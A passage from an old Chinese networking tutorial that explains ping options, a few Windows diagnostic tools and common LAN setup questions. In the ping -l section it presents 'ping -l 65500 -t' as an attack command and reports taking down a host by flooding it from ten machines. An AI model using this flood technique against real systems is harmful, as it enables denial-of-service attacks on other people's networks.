这次先简单介绍这三个！等下次有机会再给大家介绍更多的批处理文件的用途！ 32）再说几个非常简单实用的DOS命令（工具）： A、fport.exe --查看那些端口都是那些程序使用的命令。 B、netstat -an --查看那些端口于外部的IP连接。比如这里显示 ：23 XX.XX.XX.XX 而你又没有开23端口，那么，呵呵??还用我说么？ C、letmain.exe \\ip -admin -d --列出本机的administrators组的用户名查看是否有异常。 D、pslist.exe --列出进程 E、pskill.exe --杀掉进程，有时候再任务管理器中无法终止程序，那就用这个工具来停止进程。 F、login.exe --列出当前有那些用户登陆再你的机器上。 ping命令详解 ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list Options: -t Ping the specified host until stopped.To see statistics and continue - type Control-Break;To stop - type Control-C. 不停的ping地方主机，直到你按下Control-C。 此功能没有什么特别的技巧，不过可以配合其他参数使用，将在下面提到。 -a Resolve addresses to hostnames. 解析计算机NetBios名。 示例：C:＼>ping -a 192.168.1.21 Pinging [192.168.1.21] with 32 bytes of data: Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Reply from 192.168.1.21: bytes=32 time<10ms TTL=254 Ping statistics for 192.168.1.21: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms, Average = 0ms

从上面就可以知道IP为192.168.1.21的计算机NetBios名为。 -n count Number of echo requests to send. 发送count指定的Echo数据包数。 在默认情况下，一般都只发送四个数据包，通过这个命令可以自己定义发送的个数，对衡量网络速度很有帮助，比如我想测试发送50个数据包的返回的平均时间为多少，最快时间为多少，最慢时间为多少就可以通过以下获知： C:＼>ping -n 50 202.103.96.68 Pinging 202.103.96.68 with 32 bytes of data: Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Request timed out. ?????? Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Reply from 202.103.96.68: bytes=32 time=50ms TTL=241 Ping statistics for 202.103.96.68: Packets: Sent = 50, Received = 48, Lost = 2 (4% loss),Approximate round trip times in milli-seconds: Minimum = 40ms, Maximum = 51ms, Average = 46ms 从以上我就可以知道在给202.103.96.68发送50个数据包的过程当中，返回了48个，其中有两个由于未知原因丢失，这48个数据包当中返回速度最快为40ms，最慢为51ms，平均速度为46ms。 -l size Send buffer size. 定义echo数据包大小。 在默认的情况下windows的ping发送的数据包大小为32byt，我们也可以自己定义它的大小，但有一个大小的限制，就是最大只能发送65500byt，也许有人会问为什么要限制到65500byt，因为Windows系列的系统都有一个安全漏洞（也许还包括其他系统）就是当向对方一次发送的数据包大于或等于65532时，对方就很有可能挡机，所以微软公司为了解决这一安全漏洞于是限制了ping的数据包大小。虽然微软公司已经做了此限制，但这个参数配合其他参数以后危害依然非常强大，比如我们就可以通过配合-t参数来实现一个带有攻击性的命令：（以下介绍带有危险性，仅用于试验，请勿轻易施于别人机器上，否则后果自负） C:＼>ping -l 65500 -t 192.168.1.21 Pinging 192.168.1.21 with 65500 bytes of data: Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 Reply from 192.168.1.21: bytes=65500 time<10ms TTL=254 ?????? 这样它就会不停的向192.168.1.21计算机发送大小为65500byt的数据包，如果你只有一台计算机也许没有什么效果，但如果有很多计算机那么就可以使对方完全瘫痪，我曾经就做过这样的试验，当我同时使用10台以上计算机ping一台Win2000Pro系统的计算机时，不到5分钟对方的网络就已经完全瘫痪，网络严重堵塞，HTTP和FTP服务完全停止，由此可见威力非同小可。 -f Set Don`t Fragment flag in packet. 在数据包中发送“不要分段”标志。 在一般你所发送的数据包都会通过路由分段再发送给对方，加上此参数以后路由就不会再分段处理。 -i TTL Time To Live. 指定TTL值在对方的系统里停留的时间。 此参数同样是帮助你检查网络运转情况的。 -v TOS Type Of Service. 将“服务类型”字段设置为 tos 指定的值。 -r count Record route for count hops. 在“记录路由”字段中记录传出和返回数据包的路由。 在一般情况下你发送的数据包是通过一个个路由才到达对方的，但到底是经过了哪些路由呢？通过此参数就可以设定你想探测经过的路由的个数，不过限制在了9个，也就是说你只能跟踪到9个路由，如果想探测更多，可以通过其他命令实现，我将在以后的文章中给大家讲解。以下为示例： C:＼>ping -n 1 -r 9 202.96.105.101 （发送一个数据包，最多记录9个路由） Pinging 202.96.105.101 with 32 bytes of data: Reply from 202.96.105.101: bytes=32 time=10ms TTL=249 Route: 202.107.208.187 -> 202.107.210.214 -> 61.153.112.70 -> 61.153.112.89 -> 202.96.105.149 -> 202.96.105.97 ->

202.96.105.101 -> 202.96.105.150 -> 61.153.112.90 Ping statistics for 202.96.105.101: Packets: Sent = 1, Received = 1, Lost = 0 (0% loss), Approximate round trip times in milli-seconds: Minimum = 10ms, Maximum = 10ms, Average = 10ms 从上面我就可以知道从我的计算机到202.96.105.101一共通过了202.107.208.187 ，202.107.210.214 , 61.153.112.70 , 61.153.112.89 , 202.96.105.149 , 202.96.105.97这几个路由。 -s count Timestamp for count hops. 指定 count 指定的跃点数的时间戳。 此参数和-r差不多，只是这个参数不记录数据包返回所经过的路由，最多也只记录4个。 -j host-list Loose source route along host-list. 利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量为 9。 -k host-list Strict source route along host-list. 利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量为 9。 -w timeout Timeout in milliseconds to wait for each reply. 指定超时间隔，单位为毫秒。 此参数没有什么其他技巧。 ping命令的其他技巧：在一般情况下还可以通过ping对方让对方返回给你的TTL值大小，粗略的判断目标主机的系统类型是Windows系列还是UNIX/Linux系列，一般情况下Windows系列的系统返回的TTL值在100-130之间，而UNIX/Linux系列的系统返回的TTL值在240-255之间，当然TTL的值在对方的主机里是可以修改的，Windows系列的系统可以通过修改注册表以下键值实现： [HKEY_LOCAL_MACHINE＼SYSTEM＼CurrentControlSet＼Services＼Tcpip＼Parameters] "DefaultTTL"=dword:000000ff 255---FF 128---80 64----40 32----20 好了，ping命令也基本上完全讲解完了，其中还有-j,-k参数我还没有详细说明，由于某些原因也包括我自己所收集的资料过少这里也没有向大家详细介绍，请大家见谅，如果在看了这篇文章的朋友当中有知道得比我更多的，以及其他使用技巧的也希望您能告诉我，并在此先谢过。 局域网应用问题专题解答 (Rayi々) 1、问：我访问局域网中的计算机时，为什么常常被提示要输入用户名和密码？ 答：这主要是为了安全方面的考虑。而且当你重新启动计算机时又要重新输入用户名和密码，这一点确实让人会觉得很麻烦。 你只要在需要进行文件共享的计算机上建立一个相同的用户名，并且使用相同的密码，然后局域网中的计算机都利用这个用户名和密码登录，这样在网上邻居中访问对方计算机时就不需要输入用户名和密码了。 2、问：上网浏览前在局域网中应如何对IE进行设置？ 答：在局域网中使用代理服务器上网浏览时，应对浏览器进行必要的设置。以IE为例，在浏览器中代理服务器的设置方法为：用鼠标右击桌面上的IE图标，在弹出的右键菜单中选择“属性”命令。在打开的“Internet 属性”对话框中选择“连接”项，然后点击“局域网设置”，在“局域网(LAN)设置”对话框中选中“使用代理服务器”，并输入代理服务器的地址以及端口。 默认对于HTTP、FTP浏览器都是使用相同的代理服务器设置，如果对这些服务有不同的代理，你就需要进行其他的设置。 方法为：点击“高级”按钮，取消“对所有协议均使用相同的代理服务器”，并分别在不同的服务中输入各自的地址和端口，保存以上设置后，IE就可以使用代理服务器上网了。 3、问：在局域网中应如何设置OutLook Express收发邮件？ 答：在局域网中OE等电子邮件收发软件同样可以通过代理服务器上网，只是不能再使用原来的单机拨号上网设置。而且相对于其他软件的代理服务器设置，邮件软件的服务器设置要更为特殊一点，其代理服务器的类型必须是Socks4或Socks5的服务器。假设所使用的代理服务器的地址为：202.102.49.141，用户

的邮件地址为：jjxm@163.com。 那么在OE中代理服务器的设置方法为：打开OE后，选择菜单“工具→账户”。在“Internet账户”中选择“邮件”选项卡，然后在账户列表中选择需要设置的账户，点击“属性”按钮。在属性窗口中选择“服务器”选项卡(图1)，在接收和发送邮件服务器地址中输入代理服务器的地址(如202.102.49.141)，并按“用户名#邮件真实的收信地址”的命名规则，在账户名中输入 “jjxm#POP”，单击“确定”保存后即可在代理服务器中收发邮件了。 4、问：在由三台电脑组成的局域网中，我在其中一台电脑上用过Windows优化大师后，为什么这台电脑就不能登录网络，并且还提示找不到拨号适配器？ 答：根据你说的情况，是没有安装“拨号网络”。解决方法是：在“控制面板”的“添加/删除程序”中，选择“Windows安装程序”，在“组件”的“通讯”中选择“拨号网络”，然后将Windows安装盘放入光驱进行安装，重新启动计算机后就可使用拨号网络了。 5、问：如何在局域网中设置QQ、ICQ等即时通讯软件？ 答：在QQ的主窗口中点击“QQ2000”的按钮，在其主菜单中选择“系统参数”，在参数窗口中选择“网络设置”选项卡。首先在“上网类型”中选择“局域网接入Internet”，再选中“使用Socks5代理服务器”，然后输入服务器的地址以及端口(图2)，如果代理服务器中设定了用户密码，还需要输入用户名和密码。输入完毕后可以点击“测试”按钮来检测其代理是否正常。最后单击“确定”即可在代理服务器中使用QQ了。 类似地，在ICQ中选择“连接”中的“防火墙”，可以定义多个代理服务器，如Socks4、Socks5、HTTPS等。你首先要确定并选择所使用的代理服务器类型，然后在“代理服务器”部分输入主机的地址、端口，如果代理服务器设置了用户密码，还必须输入用户名和密码。对于代理服务器的类型、地址、端口等，如果你不太清楚，可以询问网络管理员。 6、问：我想用NetMeeting进行局域网中的通话，应该如何设置？ 答：如果你首次打开NetMeeting，软件会自动启动配置向导。在配置向导窗口点击“下一步”，然后输入你的基本信息(如姓名、E-mail等)。继续单击“下一步”，进入服务器配置窗口，NetMeeting允许启动时登录到目标服务器，这个功能是针对于普通上网用户的，局域网用户并不需要该功能，因此你必须取消该选项。继续单击“下一步”，选择网络速度，必须选择“局域网”，然后提示是否建立快捷方式，你可以根据需要进行选择。接下来进行音频调节测试后就完成了局域网中对NetMeeting的设置。 7、问：我知道在局域网内文件是可以共享的，但我想问的是，打印机和扫描仪应该如何共享？ 答：先来说说打印机的共享方法。你可以先在局域网内找一台电脑，并把打印机连接到这台电脑上，然后按照说明书为打印机安装好驱动程序。在Windows系统任务栏上，点击“开始→设置→控制面板”，在“控制面板”窗口中双击“打印机”图标，再用鼠标右键单击打印机图标，在弹出的右键菜单上选择“共享”，然后在打开的“打印机属性”窗口上选择“共享为”，并像共享文件那样给被共享的打印机也起一个共享名，然后点击“确定”即可。 关于扫描仪的共享设置，你首先要看一下你的扫描仪是否具有网络共享功能，是否配备了用于共享的驱动程序，也就是说只有部分扫描仪可以进行网络共享。另外不同型号扫描仪的共享设置差异很大，最好查阅一下扫描仪的说明书。 8、我用分机线上网，上网速度最大才48000bps，请问是何原因？ 还有，将Modem放在主机箱侧面，开机后（未打开Modem电源），家里的电话就处于忙音状态，如何解决？ 答：第一个问题跟你的分机电话线或线接头质量有很大关系，另外，如果你的Modem的速度平常都能接近48000bps，你也不要太在意，应该重点先看下它的实际下载速度是否令你满意。第二个问题，肯定和你主机的电源等配件的电磁辐射强和屏蔽效果差有关，你如果不想对你的主机进行大换血的话，最好用物体在主机和Modem之间进行屏蔽，或将Modem离你的主机远点，这是最好的办法。 9、我新购的网卡在电脑上无法安装，而在其他电脑上却使用正常，这是怎么回事？ 答：如果在电脑中安装好网卡后，系统没有提示找到新硬件，你可运行“添加新硬件向导”来让系统搜索新硬件。方法是单击“开始”，指向“设置”，单击“控制面板”，然后再双击“添加新硬件”。按照屏幕提示操作。你可选“让Windows搜索新硬件吗？”，单击“是（推荐）”，然后再单击“下一步”，让系统找到网卡再安装其驱动。 而如果出现以下任何现象，网卡或者网卡所在的插槽损坏： 1、“添加新硬件向导”检测不到网卡； 2、“添加新硬件向导”能够检测到网卡，但无法正常工作。 为了确定到底是网卡还是插槽的问题，可以检查网卡是否牢靠插入插槽之中。如果网卡已牢靠插入插槽之中，请改插到其他插槽之中试试。如果问题仍未解决，则可能是网卡损坏或与你的电脑不兼容，可更换之。 10、我的电脑出现“网上邻居”中找不到其他联网电脑的故障，如何解决？

答：“网上邻居”是按工作组显示计算机的。如果你的电脑没有设置工作组名称，打开“网上邻居”时就可能看不到其他电脑。单击“开始”，指向“设置”，单击“控制面板”，双击“网络”，然后再单击“标识”选项卡。你局域网中所有电脑“工作组”框中的名称应为一样，如有不同你可在此框中键入相同的工作组名称，然后单击“确定”重启电脑既可。 此外，如果“网上邻居”中不出现“整个网络”图标，可能是在Windows中没有安装必要的网络组件。要与网络上的其他计算机连接，则必须安装以下组件：Microsoft网络客户、网络适配器、至少一种网络协议（如IPX/SPX、TCP/IP等）。可打开“网络”，检查“配置”选项卡上的列表，确保已安装了各种必要的网络组件。如有，你可重新安装各种缺少的组件即可。 11、问：公司局域网，只有一台机器通过猫接入互联网，现想其他机器接入互联网，请问如何实现？ 答：这是一个比较典型的代理上网问题。你可以在带猫的机器上安装代理上网软件(如Sygate、Wingate、Winproxy)或直接使用Windows自带的共享上网功能上网(Windows 98第二版以上才带此功能)。建议使用Sygate，该软件设置较简单。先拨号上网，后安装Sygate，完毕后，Sygate将检测互联网的连接状态，并自动设置。在其他需要代理上网的机器上，指定网关和DNS的 IP地址，步骤为网上邻居→右键→属性→TCP/IP协议→属性→DNS，输入当地ISP的IP地址→网关，输入代理服务器的IP地址→确定→重启。设置完毕后，其他各项应用软件均无须设置。 12、问：局域网通过路由器、使用ADSL方式上网，如何使各工作站快速的获得可以上网的IP地址而不手工去指定？ 答：假如使用Windows 2000，可以直接使用Windows 2000自带的dhcp功能，首先建立一个作用域，然后为这个作用域添加DNS的搜索顺序和路由器的IP地址，DNS搜索顺序为当地ISP的IP地址，路由器的IP地址即设置成当前局域网的路由器IP地址，其他机器则不指定IP地址，如非使用Windows 2000，则可使用第三方的dhcp软件，比如代理软件sygate和wingate都带有dhcp功能。 13、问：公司要组建局域网，需要用到邮件服务器和WWW服务器，请问这两种服务放到一台电脑里还是分别用两台电脑？都用什么软件？谢谢！ 答：这两种服务现在用的皆比较广泛，可以只用一台计算机或用两台都可以，当然具体根据贵单位的预算开支和流量来决定。假如流量不大的话，建议只使用一台机器即可。至于软件方面，可以使用Windows 2000作服务器平台，然后使用Imail或Easymail作为邮件服务软件，www服务建议使用apache serve软件，因为Windows 2000自带的IIS存在许多漏洞，而且不安装，在建立www服务器后，需考虑支持的语言脚本，现在用的比较广的是ASP和PHP,当然，具体使用哪种语言，很简单，看你自己精通哪方面就使用哪方面的，还有一点你没提供到的，就是很有必要建立一个ftp服务，你可使用u-ftp软件，这款软件在安装和使用方面都不难。 14、问：家里原先有一台PII的计算机，最近又新增一台P4机器，操作系统都为Windows 98且已安装网卡，现在我想把他们联起来共享资源，该怎么办？ 答：你所提的实际上即现在应用的比较广泛的对等网的连接。很简单，因你已有网卡，你需做的使是购买适合长度的超五类线和2个RJ45的水晶头，再去借一把打线钳。然后再根据标准做一对跳线，即一头采用T568A标准(具体线的排列是：白绿、绿、白橙、蓝、白蓝、橙、白棕、棕)，另一头采用T568B标准(白橙、橙、白绿、蓝、白蓝、绿、白棕、棕)。然后在操作系统中添加TCP/IP协议和Netbuei协议，把工作组设置为workgroup，计算机不能相同。 15、问：办公室机器桌面的“网上邻居”图标没了，能上Internet，但无法浏览其他机器上的资源了，怎么办？ 答：说明你的Internet属性完好，但网上邻居属性中的“Microsoft 网络用户”这一客户组件没了。 进到“控制面板”中双击“网络”，先在弹出的网络对话框中点按“添加”按钮，再从随后弹出的“请选择网络组件类型”对话框中双击“客户”，最后从随后的“选择网络客户机”对话框的左侧选择“Microsoft”后再选择“Microsoft 网络用户”，“确定”再“确定”并据提示重启计算机就ok啦！先回去解决这个问题吧你?? 16、问：办公室机器桌面的网上邻居图标解决了且也能浏览其他机器的共享资源了，但发现右键中的“共享”命令没了！怎么办? 答：这是因为还缺少个“Microsoft网络上的文件与打印机共享”这一网络服务协议呢！ 先右击桌面“网上邻居”选“属性”，对话框中点按“添加”按钮，再从随后弹出的“请选择要安装的网络组件”对话框中双击“服务”，最后从随后的“选择网络服务”对话框中选择“Microsoft网络上的文件与打印机共享”，“确定”再“确定”并据提示重启计算机就ok啦！ 17、问：右键中的“共享”命令已经显身！但我设了共享不想让别人从网上邻居中看到这个共享目录，只有自己知道且能实现异地机上有完全操作的权限。 答：找到你想要共享的文件夹并右键点选“共享?”----这里我就以共享“D:\Windows 98”为例，先选中“共享为”后在共享名“Windows 98(当然也可改名共享哦)”后加一英文状态的“$”符，再选中“完全”并输入设定好“密码”，然后“确定”一次密码就OK了。 这样一来，绝对保证别人从网上邻居中看不到这个共享目录的！那~~自己想从异地机上进入并实现完全操作时怎么办呢？呵呵，这么办：从异地机的地址栏中键入“\\(机器名)\$(你的共享目录名)”并“ENTER”，

再输入密码并确定后，就进入啦！这样你可静悄悄地实现异地机上在自己设定的共享目录内进行完全操作啦！不过注意其中“\”不能误输入成“/”哦！??好了，你会了吗？ 18、问：一块PCI总线的10/100自适应网卡，无法正常工作。主要表现在网络时断时续，不管是不是Ping自己的IP地址，还是Ping对方的IP地址，都有这种情况发生。查看网卡的指示灯也出现同样的现象。 答：首先你可检查Hub的连接口是不是出了故障，将该网卡接到其他端口上，如果问题依然如故，说明Hub没有问题。然后你可用网卡随盘附带的测试程序盘查看网卡的有关参数，其IRQ值为5，再回到Windows 95/98操作系统，查看操作系统分配给网卡的参数值，其IRQ同样应是5。此外，可检查安装该网卡的主板插槽是否有故障，你可打开机箱，将网卡换个PCI插槽试试。此外，你还可检查CMOS参数设置，重新启动计算机，进入CMOS状态，选择“PNP/PCI Configuration”一项，如果IRQ5后面的状态为“Legacy ISA”（保留的ISA总线设备），就应当将IRQ5后面的状态改为“PCI/ISA PNP”。 19、问：我的电脑与一个对等网连接好了，但不能读别人电脑上的数据，这是怎么回事？ 答：可能是你没有设置好资源共享：选择“网络→配置→文件及打印共享”，将两个选项全部打勾并确定，安装成功的标志是配置中出现了“Microsoft网络上的文件与打印机共享”选项，注意，还要检查它与NetBEUI协议是否进行了绑定。选择“配置”中的NetBEUI协议，点击“属性”按钮，看绑定中“Microsoft网络上的文件与打印机共享”、“Microsoft网络用户”前是否已经有对勾了。还要在“网络→标识”里将“计算机名”设置好，确定之后系统将重新启动。 20、问：我的网络从集线器升级为交换机后，感觉速度并没有多大提高，是什么原因？ 答：这种情况需要从以下几个方面来分析： 1、首先应确认网络是否工作在100M状态，具体做法是：确认网线是五类以上线，网线做法遵循100M标准，网卡支持100M工作状态，只有满足以上条件，交换机才能工作于100M状态，从而最大限度地体现交换机的性能优势。 2、如果网络在升级前工作正常，数据交换量不是很大，数据冲突和广播风暴现象出现的不是很频繁，那么升级后网络性能的提升可能不是很明显，这是正常现象。 3、还有一种情况是因为网络结构设置不当引起的，例如，如果把集线器放在第一级连接服务器，而把交换机放在下一级来连接工作站，这样数据交换仍然通过集线器进行，交换机的性能优势没有体现出来。所以，在组网时应当充分考虑网络结构的合理性，应将性能较好的设备置于整个网络的最高级。